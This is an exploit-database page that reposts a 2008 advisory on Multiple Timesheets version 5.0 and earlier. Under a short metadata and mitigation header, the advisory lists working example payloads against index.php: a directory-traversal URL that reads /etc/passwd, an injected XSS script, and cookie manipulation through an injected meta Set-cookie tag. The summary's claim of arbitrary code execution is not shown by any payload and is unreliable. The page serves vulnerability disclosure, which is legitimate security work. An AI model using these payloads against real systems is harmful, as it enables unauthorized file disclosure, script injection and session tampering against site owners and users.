Mutiple Timesheets - exploit.company

vendor:

Multiple Timesheets

by:

JosS

7.5

CVSS

HIGH

Directory Traversal, Cross Site Scripting, Cookie Manipulation

22 (Path Traversal), 79 (Cross-site Scripting), 614 (Cookie Manipulation)

CWE

Product Name: Multiple Timesheets

Affected Version From: 5.0 and prior

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Mutiple Timesheets <= 5.0 - Multiple Remote Vulnerabilities

Multiple Timesheets version 5.0 and prior are vulnerable to Directory Traversal, Cross Site Scripting and Cookie Manipulation. An attacker can exploit these vulnerabilities to gain access to sensitive information, manipulate cookies and execute arbitrary code on the vulnerable system.

Mitigation:

Upgrade to the latest version of Multiple Timesheets, apply the latest security patches and configure the application securely.

Source

Exploit-DB raw data:

--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+              Mutiple Timesheets <= 5.0 - Multiple Remote Vulnerabilities           +==--
--==+====================================================================================+==--
                     [+] [JosS] + [Spanish Hackers Team] + [Sys - Project]

[+] Info:

[~] Software: Mutiple Timesheets
[~] Download: http://riceball.com/drupal/files/mts-5.zip
[~] Exploit: Multiple Remote Vulnerabilities [High]
[~] Bug Found By: JosS
[~] Contact: sys-project[at]hotmail.com
[~] Web: http://www.spanish-hackers.com
[~] Good!

[+] Directory traversal:

[~] Vuln File: index.php
[~] Exploit: http://localhost/PATH/?tab=[FILE]
[~] Example: http://localhost/apps/mts/mts/?tab=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

[+] Cross Site Scripting:

[~] Vuln File: index.php
[~] Exploit: http://localhost/PATH/?tab=[XSS]
[~] Example: http://localhost/apps/mts/mts/?tab=>'><ScRiPt%20%0a%0d>alert("JosS")%3B</ScRiPt>

[+] Cookie Manipulation:

[~] Vuln File: index.php, clientinfo.php, invoices.php, smartlinks.php, todo.php
[~] Exploit: http://localhost/PATH/index.php?mode=edit&tab=[Cookie]
[~] Example: /apps/mts/mts/index.php?mode=edit&tab=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>


--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+                                       JosS                                         +==--
--==+====================================================================================+==--
                                       [+] [The End]

# milw0rm.com [2008-03-16]